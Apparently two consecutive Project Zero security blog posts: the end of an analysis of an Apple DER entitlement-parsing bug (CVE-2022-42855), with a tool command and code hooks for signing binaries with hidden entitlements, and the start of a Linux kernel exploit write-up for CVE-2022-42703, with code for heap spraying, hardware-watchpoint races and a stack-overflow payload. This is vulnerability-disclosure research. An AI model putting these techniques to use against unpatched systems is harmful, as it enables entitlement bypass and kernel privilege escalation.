We are not going to analyze the full behavior of vnode_check_signature. However, I will highlight the most important actions and those relevant to understanding DER entitlements workflow:

  • First, vnode_check_signature retrieves the entitlements in the DER format. If the currently loaded binary does not contain DER entitlements and only contains entitlements in the XML format, AppleMobileFileIntegrity calls transmuteEntitlementsInDaemon which uses amfid to convert entitlements from XML into DER format. The conversion itself is done via CFPropertyListCreateWithData (to convert XML to CFDictionary) and CESerializeCFDictionary (which converts CFDictionary to DER representation).

  • Checks on the signature are performed using the CoreTrust library by calling CTEvaluateAMFICodeSignatureCMS. This process has recently been documented in another vulnerability writeup and will not be examined in detail as it does not relate to entitlements directly.

  • Additional checks on the signature and entitlements are performed in amfid via the verify_code_directory function. This call will be analyzed in-depth later. One interesting detail about this interaction is that amfid receives the path to the executable as a parameter. In order to prevent race conditions where the file is changed between being loaded by the kernel and being checked by amfid, amfid returns the cdHash of the checked file. It is then verified that this cdHash matches the cdHash of the file in the kernel.

  • Provisioning profile information is retrieved and it is checked that the entitlements in the binary are a subset of the entitlements in the provisioning profile. This is done with the CEContextIsSubset function. This step does not appear to be present on macOS running on Intel CPUs, however even in that case, the entitlements are still checked in amfid as will be shown below.

The verify_code_directory function of amfid performs (among other things) the following actions:

  • Parses the binary and extracts all the relevant information for integrity checking. The code that does that is part of the open-source Security library and the two most relevant classes here are StaticCode and SecStaticCode. This code is also responsible for extracting the DER-encoded entitlements. Once again, if only XML-encoded entitlements are present, they get converted to DER format. This is, once again, done by the CFPropertyListCreateWithData and CESerializeCFDictionary pair of functions. Additionally, for later use, entitlements are also converted to CFDictionary representation. This conversion from DER to CFDictionary is done using the CEManagedContextFromCFData and CEQueryContextToCFDictionary function pair.

  • Checks that the signature signs the correct cdHash and checks the signature itself. The checking of the digital signature certificate chain isn’t actually done by the amfid process. amfid calls into trustd for that.

  • On macOS, the entitlements contained in the binary are filtered into restricted and unrestricted ones. On macOS, the unrestricted entitlements are com.apple.application-identifier, com.apple.security.application-groups*, com.apple.private.signing-identifier and com.apple.security.*. If the binary contains any entitlements not listed above, it needs to be checked against a provisioning profile. The check here relies on the entitlements CFDictionary, extracted earlier in amfid.

Later, when the binary runs, if the operating system wants to check that the binary contains an entitlement to perform a specific action, it can do this in several ways. The “old way” of doing this is to retrieve a dictionary representation of entitlements and query a dictionary for a specific key. However, there is also a new API for querying entitlements, where the caller first creates a CEQuery object containing the entitlement key they want to query (and, optionally, the expected value) and then performs the query by calling CEContextQuery function with the CEQuery object as a parameter. For example, the IOTaskHasEntitlement function, which takes an entitlement name and returns bool relies on the latter API.

libCoreEntitlements

You might have noticed that a lot of functions for interacting with DER entitlements start with the letters “CE”, such as CEQueryContextToCFDictionary or CEContextQuery. Here, CE stands for libCoreEntitlements, which is a new library created specifically for DER-encoded entitlements. libCoreEntitlements is present both in the userspace (as libCoreEntitlements.dylib) and in the OS kernel (as a part of AppleMobileFileIntegrity kernel extension). So any vulnerability related to parsing the DER entitlement format would be located there.

“There are no vulnerabilities here”, I declared in one of the Project Zero team meetings. At the time, I based this claim on the following:

  • There is a single library for parsing DER entitlements, unlike the four/five used for XML entitlements. While there are two versions of the library, in userspace and kernel, those appear to be the same. Thus, there is no potential for parsing differential bugs like Psychic Paper. In addition to this, binary formats are much less susceptible to such issues in the first place.

  • The library is quite small. I both reviewed and fuzzed the library for memory corruption vulnerabilities and didn’t find anything.

It turns out I was completely wrong (as often happens when someone declares code to be bug free). But first…

Interlude: SHA1 Collisions

After my failure to find a good libCoreEntitlements bug, I turned to other ideas. One thing I noticed when digging into Apple integrity checks is that SHA1 is still supported as a valid hash type for Code Directory / cdHash. Since practical SHA1 collision attacks have been known for some time, I wanted to see if they can somehow be applied to break the entitlement check.

It should be noted that there are two kinds of SHA1 collision attacks:

  • Identical prefix attacks, where an attacker starts with a common file prefix and then constructs collision blocks such that SHA1(prefix + collision_blocks1) == SHA1(prefix + collision_blocks2).

  • Chosen prefix attacks, where the attacker starts with two different prefixes chosen by the attacker and constructs collision blocks such that SHA1(prefix1 + collision_blocks1) == SHA1(prefix2 + collision_blocks2).

While both attacks are currently practical against SHA1, the first type is significantly cheaper than the second one. In the SHA-1 is a Shambles paper from 2020, the authors report a “cost of US$ 11k for a (identical prefix) collision, and US$ 45k for a chosen-prefix collision”. So I wanted to see if an identical prefix attack on DER entitlements is possible. Special thanks to Ange Albertini for bringing me up to speed on the current state of SHA1 collision attacks.

My general idea was to

  • Construct two sets of entitlements that have the same SHA1 hash
  • Since entitlements will have the same SHA1 hash, the cdHash of the corresponding binaries will also be the same, as long as the corresponding Code Directories use SHA1 as the hash algorithm.
  • Exploit a race condition and switch the binary between being opened by the kernel and being opened by amfid
  • If everything goes well, amfid is going to see one set of entitlements and the kernel another set of entitlements, while believing that the binary hasn’t changed.

In order to construct an identical-prefix collision, my plan was to have an entitlements file that contains a long string. The string would declare a 16-bit size, and the identical prefix would end right at the place where the string length is stored. That way, when a collision is found, the lengths of the string in the two files would differ. Following the lengths would be more collision data (junk), but that would be considered string content and the parsing of the file would still succeed. Since the length of the string in the two files would be different, parsing would continue from two different places in the two files. This idea is illustrated in the following image.

A (failed) idea for exploiting an identical prefix SHA1 collision against DER entitlements. The blue parts of the files are the same, while the green and red parts represent (different) collision blocks.
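Concretely, the header of such a long string might look as follows (hypothetical bytes for illustration, not the actual layout of the colliding files):

// A UTF8STRING longer than 255 bytes uses the long-form length encoding.
static const uint8_t long_string_header[] = {
    0x0c,        // UTF8STRING
    0x82,        // long form: the length is in the next 2 bytes
    0x01, 0x00,  // 0x0100 = 256 content bytes follow
};
// The identical prefix would end just before the two length bytes, so the
// colliding blocks in the two files would encode different lengths, and
// parsing would resume at two different offsets.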

Except it won’t work.

The reason it won’t work is that every object in DER, including an object that contains other objects, has a size. Once again, hat tip to Ange Albertini who pointed out right away that this is going to be a problem.

Since each individual entitlement is stored in a separate sequence object, with our collision we could change the length of a string inside the sequence object (e.g. a value of some entitlement), but not change the length of the sequence object itself. Having a mismatch between the sequence length and the length of content inside the sequence could, depending on how the parser is implemented, lead to a parsing failure. Alternatively, if the parser was more permissive, the parser would succeed but would continue parsing after the end of the current sequence, so the collision wouldn’t cause different entitlements to be seen in two different files.

Unless the sequence length is completely ignored.

So I took another look at the library, specifically at how sequence length was handled in different parts of the library, and that is when I found the actual bug.

The actual bug

libCoreEntitlements does not implement traversing DER entitlements in a single place. Instead, traversing is implemented in (at least) three different places:

  • Inside recursivelyValidateEntitlements, called from CEValidate which is used to validate entitlements before being loaded (e.g. CEValidate is called from CEManagedContextFromCFData which was mentioned before). Among other things, CEValidate ensures that entitlements are in alphabetical order and there are no duplicate entitlements.
  • der_vm_iterate, which is used when converting entitlements to dictionary (CEQueryContextToCFDictionary), but also from CEContextIsSubset.
  • der_vm_execute_nocopy, which is used when querying entitlements using CEContextQuery API.

The actual bug is that these traversal algorithms behave slightly differently, in particular in how they handle entitlement sequence length. der_vm_iterate behaves correctly: after processing a single key/value sequence, it continues processing after the sequence end (as indicated by the sequence length). recursivelyValidateEntitlements and der_vm_execute_nocopy, however, completely ignore the sequence length (beyond an initial check that it is within the bounds of the entitlements blob) and, after processing a single entitlement (key/value sequence), continue processing after the end of the value. This difference in iterating over entitlements is illustrated in the following image.

Illustration of how different algorithms within libCoreEntitlements traverse the same DER structure. der_vm_iterate is shown as green arrows on the left while der_vm_execute is shown as red arrows on the right. The red parts of the file represent a “hidden” entitlement that is only visible to the second algorithm.
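In toy form, reusing the der_header sketch from earlier (error handling omitted for brevity), the two walkers parse one entitlement identically but disagree about where the next one starts:

// Parse one key/value SEQUENCE starting at p (no error handling).
static void walk_one_entry(const uint8_t* p, const uint8_t* end) {
  uint8_t tag;
  size_t seq_len, key_len, val_len;
  const uint8_t* seq = der_header(p, end, &tag, &seq_len);              // SEQUENCE
  const uint8_t* key = der_header(seq, seq + seq_len, &tag, &key_len);  // key string
  const uint8_t* val = der_header(key + key_len, seq + seq_len, &tag, &val_len);

  // der_vm_iterate (correct): skip the whole sequence, children included.
  const uint8_t* next_correct = seq + seq_len;

  // der_vm_execute_nocopy (buggy): stop right after the value, so an
  // element nested after the value inside the sequence is treated as the
  // next entitlement - this is exactly where a "hidden" entitlement lives.
  const uint8_t* next_buggy = val + val_len;

  (void)next_correct; (void)next_buggy;
}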

This allowed hiding entitlements by embedding them as children of other entitlements, as shown below. Such entitlements would then be visible to CEValidate and CEContextQuery, but hidden from CEQueryContextToCFDictionary and CEContextIsSubset.

SEQUENCE          

  UTF8STRING        :application-identifier

  UTF8STRING        :testapp

  SEQUENCE          

    UTF8STRING        :com.apple.private.foo

    UTF8STRING        :bar

SEQUENCE          

  UTF8STRING        :get-task-allow

  BOOLEAN           :255

Luckily (for an attacker), the functions used to perform the check that all entitlements in the binary are a subset of those in the provisioning profile wouldn't see these hidden entitlements, which would only surface when the kernel would query for the presence of a specific entitlement using the CEContextQuery API.

Since CEValidate would also see the “hidden” entitlements, these would need to be in alphabetical order together with “normal” entitlements. However, because generally allowed entitlements such as application-identifier on iOS and com.apple.application-identifier on macOS appear pretty soon in the alphabetical order, this requirement doesn’t pose an obstacle for exploitation.

Exploitation

In order to try to exploit these issues, some tooling was required. Firstly, tooling to create crafted entitlements DER. For this, I created a small utility called createder.cpp which can be used for example as

./createder entitlements.der com.apple.application-identifier=testapp -- com.apple.private.security.kext-collection-management 

where entitlements.der is the output DER encoded entitlements file, entitlements before “--” are “normal” entitlements and those after “--” are hidden.

Next, I needed a way to embed such crafted entitlements into a signature blob. Normally, for signing binaries, Apple’s codesign utility is used. However, this utility only accepts XML entitlements as input and the user can’t provide a DER blob. At some point, codesign converts the user-provided XML to DER and embeds both in the resulting binary.

I decided the easiest way to embed custom DER in a binary would be to modify codesign behavior, specifically the XML to DER conversion process. To do this, I used TinyInst, a dynamic instrumentation library I developed together with contributors. TinyInst currently supports macOS and Windows.

In order to embed custom DER, I hooked two functions from libCoreEntitlements that are used during XML to DER conversion: CESizeSerialization and CESerialize (CESerializeWithOptions on macOS 13 / iOS 16). The first one computes the size of DER while the second one outputs DER bytes.

Initially, I wrote these hooks using TinyInst’s general-purpose low-level instrumentation API. However, since this process was more cumbersome than necessary, in the meantime I created an API specifically for function hooking. So instead of linking to my initial implementation that I sent with the bug report to Apple, let me instead show how the hooks would be implemented using the new TinyInst Hook API:

cehook.h

#include "hook.h"

class CESizeSerializationHook : public HookReplace {

public:

  CESizeSerializationHook() : HookReplace("libCoreEntitlements.dylib",

                                          "_CESizeSerialization",3) {}

protected:

  void OnFunctionEntered() override;

};

class CESerializeWithOptionsHook : public HookReplace {

public:

  CESerializeWithOptionsHook() : HookReplace("libCoreEntitlements.dylib",

                                             "_CESerializeWithOptions", 6) {}

protected:

  void OnFunctionEntered() override;

};

// the main client

class CEInst : public TinyInst {

public:

  CEInst();

protected:

  void OnModuleLoaded(void* module, char* module_name) override;

};

cehook.cpp

#include "cehook.h"

#include <fstream>

char *der;

size_t der_size;

size_t kCENoError;

// read entitlements.der into buffer

void ReadEntitlementsFile() {

  std::ifstream file("entitlements.der", std::ios::binary | std::ios::ate);

  if(file.fail()) {

    FATAL("Error reading entitlements file");

  }

  der_size = (size_t)file.tellg();

  file.seekg(0, std::ios::beg);

  der = (char *)malloc(der_size);

  file.read(der, der_size);

}

void CESizeSerializationHook::OnFunctionEntered() {

  // 3rd argument (output) is a pointer to the size

  printf("In CESizeSerialization\n");

  size_t out_addr = GetArg(2);

  RemoteWrite((void*)out_addr, &der_size, sizeof(der_size));

  SetReturnValue(kCENoError);

}

void CESerializeWithOptionsHook::OnFunctionEntered() {

  // 5th argument points to output buffer

  printf("In CESerializeWithOptions\n");

  size_t out_addr = GetArg(4);

  RemoteWrite((void*)out_addr, der, der_size);

  SetReturnValue(kCENoError);

}

CEInst::CEInst() {

  ReadEntitlementsFile();

  RegisterHook(new CESizeSerializationHook());

  RegisterHook(new CESerializeWithOptionsHook());

}

void CEInst::OnModuleLoaded(void* module, char* module_name) {

  if(!strcmp(module_name, "libCoreEntitlements.dylib")) {

    // we must get the value of kCENoError,

    // which is libCoreEntitlements return value in case no error

    size_t kCENoError_addr = 

           (size_t)GetSymbolAddress(module, (char*)"_kCENoError");

    if (!kCENoError_addr) FATAL("Error resolving symbol");

    RemoteRead((void *)kCENoError_addr, &kCENoError, sizeof(kCENoError));

  }

  TinyInst::OnModuleLoaded(module, module_name);

}

HookReplace (base class for our 2 hooks) is a helper class used to completely replace the function implementation with the hook. CESizeSerializationHook::OnFunctionEntered() and CESerializeWithOptionsHook::OnFunctionEntered() are the bodies of the hooks. Additional code is needed to read the replacement entitlement DER and also to retrieve the value of kCENoError, which is a value libCoreEntitlements functions return on success and that we must return from our hooked versions. Note that, on macOS Monterey, CESerializeWithOptions should be replaced with CESerialize and the 3rd argument will be the output address rather than 4th.

So, with that in place, I could sign a binary using DER provided in the entitlements.der file.

Now, with the tooling in place, the question becomes how to exploit it. Or rather, which entitlement to target. In order to exploit the issue, we need to find an entitlement check that is ultimately made using the CEContextQuery API. Unfortunately, that rules out most userspace daemons - all the ones I looked at still did entitlement checking the “old way”, by first obtaining a dictionary representation of entitlements. That leaves “just” the entitlement checks done by the OS kernel.

Fortunately, a lot of checks in the kernel are made using the vulnerable API. Some of these checks are done by AppleMobileFileIntegrity itself using functions like OSEntitlements::queryEntitlementsFor, AppleMobileFileIntegrity::AMFIEntitlementGetBool or proc_has_entitlement. But there are other APIs as well. For example, the IOTaskHasEntitlement and IOCurrentTaskHasEntitlement functions that are used from over a hundred places in the kernel (according to macOS Monterey kernel cache) end up calling CEContextQuery (by first calling amfi->OSEntitlements_query()).

One other potentially vulnerable API was IOUserClient::copyClientEntitlement, but only on Apple silicon, where pmap_cs_enabled() is true. Although I didn’t test this, there is some indication that in that case the CEContextQuery API or something similar to it is used. IOUserClient::copyClientEntitlement is most notably used by device drivers to check entitlements.

I attempted to exploit the issue on both macOS and iOS. On macOS, I found places where such an entitlement bypass could be used to unlock previously unreachable attack surfaces, but nothing that would immediately provide a stand-alone exploit. In the end, to report something while looking for a better primitive, I reported that I was able to invoke functionality of the kext_request API (kernel extension API) that I normally shouldn’t be able to do, even as the root user. At the time, I did my testing on macOS Monterey, versions 12.6 and 12.6.1.

On iOS, exploiting such an issue would potentially be more interesting, as it could be used as part of a jailbreak. I was experimenting with iOS 16.1 and nothing I tried seemed to work, but due to the lack of introspection on the iOS platform I couldn’t figure out why at the time.

That is, until I received a reply from Apple on my macOS report, asking me if I could reproduce it on macOS Ventura. macOS Ventura had been released the same week I sent my report to Apple, and I was hesitant to upgrade to a new major version while I had a working setup on macOS Monterey. But indeed, when I upgraded to Ventura, and after making sure my tooling still worked, the DER issue no longer reproduced. This was likely also the reason all of my iOS experiments were unsuccessful: iOS 16 shares its codebase with macOS Ventura.

It appears that the issue was fixed due to refactoring and not as a security issue (macOS Monterey would have been updated in that case as well, as Apple releases some security patches not just for the latest major version of macOS, but also for the two previous ones). Looking at the code, it appears the API libCoreEntitlements uses to do low-level DER parsing has changed somewhat - on macOS Monterey, libCoreEntitlements used mostly ccder_decode* functions to interact with DER, while on macOS Ventura ccder_blob_decode* functions are used more often. The latter additionally take the parent DER structure as input and thus make processing of hierarchical DER structures somewhat less error-prone. As a consequence of this change, der_vm_execute_nocopy continues processing the next key/value sequence after the end of the current sequence (the intended behavior) and not, as before, after the end of the value object. At this point, since I could no longer reproduce the issue on the latest OS release, I was no longer motivated to write the exploit and stopped my efforts in order to focus on other projects.

Apple addressed the issue as CVE-2022-42855 on December 13, 2022. While Apple applied the CVE to all supported versions of their operating systems, including macOS Ventura and iOS 16, on those latest OS versions the patch seems to serve as an additional validation step. Specifically, on macOS Ventura, the patch is applied to the function der_decode_key_value and makes sure that the key/value sequence does not contain other elements besides just the key and the value (in other words, it makes sure that the length of the sequence matches the combined length of the key and value objects).
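To make the described check concrete, here is a toy model of it in C. This is not Apple's code: the TLV walker only handles short-form DER lengths and all names are invented, but it captures the validation the patch adds - after decoding the key and the value, the end of the value must coincide with the end of the enclosing sequence.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy DER TLV walker: returns a pointer just past one element, or NULL.
 * Only short-form lengths are handled, which is enough to illustrate. */
static const uint8_t *skip_element(const uint8_t *p, const uint8_t *end) {
    if (!p || end - p < 2 || (p[1] & 0x80))
        return NULL;
    size_t len = p[1];
    return (end - p - 2 >= (ptrdiff_t)len) ? p + 2 + len : NULL;
}

/* The check as described: the body of a key/value SEQUENCE must contain
 * exactly two elements - the key and the value - and nothing after them. */
static bool key_value_sequence_is_clean(const uint8_t *body,
                                        const uint8_t *body_end) {
    const uint8_t *after_key = skip_element(body, body_end);
    const uint8_t *after_value = skip_element(after_key, body_end);
    return after_value != NULL && after_value == body_end;
}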

Conclusion

It is difficult to claim that a particular code base has no vulnerabilities. While that might be possible for specific types of vulnerabilities, it is difficult, and potentially impossible, to predict all the types of vulnerabilities a complex codebase might have. After all, you can’t reason about what you don’t know.

While DER encoding is certainly a much safer choice than XML when it comes to parsing logic issues, this blog post demonstrates that such issues are still possible even with the DER format.

And what about the SHA1 collision? While the identical prefix attack shouldn’t work against DER, doesn’t that still leave the chosen prefix attack? Maybe, but that’s something to explore another time. Or maybe (hopefully) Apple will remove SHA1 support in their signature blobs and there will be nothing to explore at all.

Exploiting CVE-2022-42703 - Bringing back the stack attack

8 December 2022 at 19:04

Seth Jenkins, Project Zero


This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 - Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel's memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is, and the commit that introduced the bug are great resources for gaining additional context.

Setting the scene

Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(..., MADV_PAGEOUT) can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():



struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,

                                          struct rmap_walk_control *rwc)

{

        struct anon_vma *anon_vma = NULL;

        struct anon_vma *root_anon_vma;

        unsigned long anon_mapping;


        rcu_read_lock();

        anon_mapping = (unsigned long)READ_ONCE(folio->mapping);

        if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)

                goto out;

        if (!folio_mapped(folio))

                goto out;


        // anon_vma is dangling pointer

        anon_vma = (struct anon_vma *) (anon_mapping - PAGE_MAPPING_ANON);

        // root_anon_vma is read from dangling pointer

        root_anon_vma = READ_ONCE(anon_vma->root);

        if (down_read_trylock(&root_anon_vma->rwsem)) {

                [...]

                if (!folio_mapped(folio)) { // false

                        [...]

                }

                goto out;

        }


        if (rwc && rwc->try_lock) { // true

                anon_vma = NULL;

                rwc->contended = true;

                goto out;

        }

        [...]

out:

        rcu_read_unlock();

        return anon_vma; // return dangling pointer

}


One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.


Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker-controlled memory.
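As an illustrative sketch of the spray step (the pipe count is arbitrary and the payload layout is exploit-specific - the fake anon_vma, with its controlled root pointer, has to sit at the page offset where the freed object lived):

#include <stddef.h>
#include <unistd.h>

#define NUM_PIPES 512 /* spray size chosen arbitrarily for illustration */

static int pipes[NUM_PIPES][2];

/* Write one page of controlled data into many fresh pipe buffers so
 * that one of the newly allocated pipe pages reclaims the page that
 * previously backed the anon_vma slab. */
int spray_pipe_buffers(const void *fake_page, size_t page_size) {
    for (int i = 0; i < NUM_PIPES; i++) {
        if (pipe(pipes[i]) < 0)
            return -1;
        /* each page-sized write lands in one newly allocated page */
        if (write(pipes[i][1], fake_page, page_size) != (ssize_t)page_size)
            return -1;
    }
    return 0;
}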


At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:


struct rw_semaphore {

        atomic_long_t count;

        atomic_long_t owner;

        struct optimistic_spin_queue osq; /* spinner MCS lock */

        raw_spinlock_t wait_lock;

        struct list_head wait_list;

};


...


static inline int __down_read_trylock(struct rw_semaphore *sem)

{

        long tmp;


        DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);


        tmp = atomic_long_read(&sem->count);

        while (!(tmp & RWSEM_READ_FAILED_MASK)) {

                if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,

                                                    tmp + RWSEM_READER_BIAS)) {

                        rwsem_set_reader_owned(sem);

                        return 1;

                }

        }

        return 0;

}



It was helpful to emulate down_read_trylock() in Unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer, and we cannot modify any non-8-byte-aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
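A small user-space model makes the constraint concrete. The constants below are assumptions copied from mainline kernel/locking/rwsem.c; note how a kernel pointer (top bit set) and values with low bits set are rejected, while aligned values with a clear top bit get 0x100 added:

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed constants, mirroring kernel/locking/rwsem.c */
#define RWSEM_WRITER_LOCKED (1ULL << 0)
#define RWSEM_FLAG_WAITERS  (1ULL << 1)
#define RWSEM_FLAG_HANDOFF  (1ULL << 2)
#define RWSEM_FLAG_READFAIL (1ULL << 63)
#define RWSEM_READER_BIAS   (1ULL << 8)
#define RWSEM_READ_FAILED_MASK (RWSEM_WRITER_LOCKED | RWSEM_FLAG_WAITERS | \
                                RWSEM_FLAG_HANDOFF | RWSEM_FLAG_READFAIL)

int main(void) {
    uint64_t samples[] = {
        0x0000000000000000, /* all bits clear: +0x100 gets written     */
        0x4141414141414100, /* aligned, MSB clear: also corruptible    */
        0xffff888012345600, /* kernel pointer: MSB set, left untouched */
        0x0000000000000001, /* low bit set: trylock fails, no write    */
    };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        uint64_t c = samples[i];
        if (!(c & RWSEM_READ_FAILED_MASK))
            printf("%#018" PRIx64 " -> trylock succeeds, count becomes %#018" PRIx64 "\n",
                   c, c + RWSEM_READER_BIAS);
        else
            printf("%#018" PRIx64 " -> trylock fails, memory untouched\n", c);
    }
    return 0;
}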

Stack corruption…

On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. Brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack - except in that case, kernel GPRs are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.


One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.
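As a sketch of how a tracer arms such a watchpoint (the DR7 encoding below selects a 4-byte read/write breakpoint in slot 0; the exact bit positions are the architectural ones but should be verified against the manuals):

#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>

/* Program a read/write hardware watchpoint on [addr] in the traced
 * task: DR0 holds the address, DR7 enables and configures slot 0. */
int set_rw_watchpoint(pid_t pid, void *addr) {
    /* L0 enable (bit 0), condition R/W (bits 16-17 = 0b11),
     * length 4 bytes (bits 18-19 = 0b11) */
    unsigned long dr7 = 1UL | (0x3UL << 16) | (0x3UL << 18);

    if (ptrace(PTRACE_POKEUSER, pid,
               (void *)offsetof(struct user, u_debugreg[0]), addr) < 0)
        return -1;
    return ptrace(PTRACE_POKEUSER, pid,
                  (void *)offsetof(struct user, u_debugreg[7]),
                  (void *)dr7) < 0 ? -1 : 0;
}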


Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.

…begets stack corruption

The attack strategy starts as follows (a minimal sketch of the first three steps follows the list):

  1. Fork a process Y from process X.

  2. Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.

  3. Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state.

  4. Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.
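A skeletal version of the first three steps might look like the following, reusing the set_rw_watchpoint() helper sketched earlier; the arbitrary-write spam of step 4 is elided since it is specific to the underlying bug:

#include <signal.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

int set_rw_watchpoint(pid_t pid, void *addr); /* from the earlier sketch */

int main(void) {
    struct utsname *buf = malloc(sizeof(*buf)); /* this is [addr] */
    pid_t child = fork();

    if (child == 0) {
        /* Process Y: get traced, then hammer uname(2) so the kernel's
         * copy_to_user into buf keeps tripping the watchpoint. */
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);
        for (;;)
            uname(buf);
    }

    /* Process X: wait for the SIGSTOP, arm the watchpoint, and keep
     * resuming Y every time a watchpoint hit stops it with SIGTRAP.
     * Step 4 (spamming the arbitrary write at the saved rcx slot on
     * the DB exception stack) would run concurrently from here. */
    waitpid(child, NULL, 0);
    set_rw_watchpoint(child, buf);
    while (ptrace(PTRACE_CONT, child, NULL, NULL) == 0 &&
           waitpid(child, NULL, 0) == child)
        ;
    return 0;
}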


DB Exception handling while the arbitrary write primitive writes to the CEA stack leads to corruption of the rcx register



The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.


Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we induce the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivial to bypass both mitigations and overwrite the return address.
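Purely for illustration, the userland buffer handed to the oversized copy_from_user could be laid out as below. Every offset and the gadget address are hypothetical and depend on the target kernel build; the structure, though, follows directly from the leak - keep the cookie slot intact, then replace the saved return address:

#include <stdint.h>
#include <string.h>

/* Hypothetical frame offsets for the targeted prctl(2) handler. */
#define COOKIE_OFF  0x100
#define RETADDR_OFF 0x118
#define PAYLOAD_LEN 0x200

void build_payload(uint8_t *payload, uint64_t leaked_cookie,
                   uint64_t gadget_addr /* ROP entry, KASLR-adjusted */) {
    memset(payload, 'A', PAYLOAD_LEN);                /* filler         */
    memcpy(payload + COOKIE_OFF, &leaked_cookie, 8);  /* keep cookie OK */
    memcpy(payload + RETADDR_OFF, &gadget_addr, 8);   /* hijack return  */
}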


Image showing that we’ve gained control of the instruction pointer


Completing a ROP chain for the kernel is left as an exercise to the reader.

Fetching the KASLR slide with prefetch

